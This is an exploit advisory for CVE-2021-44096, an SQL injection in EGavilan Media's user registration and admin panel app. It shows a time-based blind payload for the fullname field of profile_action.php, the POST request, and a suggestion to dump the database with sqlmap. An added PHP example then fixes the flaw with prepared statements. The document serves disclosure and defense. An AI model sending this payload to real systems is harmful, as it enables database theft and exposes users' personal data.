# Exploit Title: SQL injection vulnerability in EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 via "profile_action — update_user" that allows a remote attacker to compromise the application's SQL database.
# Exploit Author: Shubham Pandey
# Vendor: EGavilan Media
# Application Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel
# CVE: CVE-2021-44096
What is SQL injection:
SQL injection is a web security flaw that lets an attacker interfere with the queries a web application makes to its database. It allows the attacker to read data they would not ordinarily be able to see, including data belonging to other users or any other information the application can access. In many cases the attacker can also modify or delete that data, permanently altering the application's content or behavior.
By exploiting the login page parameters with a tool such as sqlmap, an attacker can dump the entire database. The dumped data can compromise the confidentiality of users' personal details, transaction details and financial information, session tokens, and so on, and can be publicly disclosed or used for competitive gain, leading to financial loss for the organization.
Vulnerable Parameter: "fullname="
Steps to Reproduce:
1. Submit fullname='%2b(select*from(select(sleep(20)))a)%2b' (%2b is the URL-encoded "+") and time the response: if it arrives after about 20 seconds, the application's SQL database is executing the injected query.
2. Login page request:
POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3. The web server accepts the payload; using a tool such as sqlmap confirms that the payload is executed and the database can be compromised.
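From the defender's side, the root cause is that the fullname value reaches the UPDATE statement as SQL text. The following is an added example of a hardened update_user handler in PHP; it is not code from the EGavilan Media project, and the table name, column names, database credentials and session key are assumed.

```php
<?php
// Added example (not the project's code): hardened profile_action.php / update_user.
// Assumed: a "users" table with "id" and "fullname" columns, and $_SESSION['user_id']
// set at login. Credentials below are placeholders.
session_start();

// Only an authenticated user may update a profile, and only their own row.
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit('not authenticated');
}
$userId = (int) $_SESSION['user_id'];

if (($_POST['action'] ?? '') !== 'update_user') {
    http_response_code(400);
    exit('unknown action');
}

// Basic input validation: reject empty or over-long names (byte length limit).
$fullname = trim((string) ($_POST['fullname'] ?? ''));
if ($fullname === '' || strlen($fullname) > 200) {
    http_response_code(422);
    exit('invalid fullname');
}

$mysqli = new mysqli('localhost', 'APP_DB_USER', 'APP_DB_PASSWORD', 'APP_DB'); // placeholders
$mysqli->set_charset('utf8mb4');

// Prepared statement: fullname is sent to MySQL as a bound value, never spliced
// into the SQL string. A submission such as '+(select*from(select(sleep(20)))a)+'
// is therefore stored as literal text and the sleep() is never evaluated.
$stmt = $mysqli->prepare('UPDATE users SET fullname = ? WHERE id = ?');
$stmt->bind_param('si', $fullname, $userId);
$stmt->execute();

header('Content-Type: application/json');
echo json_encode(['updated' => $stmt->affected_rows === 1]);
```

Every other field the handler writes needs the same binding; a profile update that takes roughly 20 seconds to respond, as in step 1 above, is the signal that a field is still being concatenated into the query.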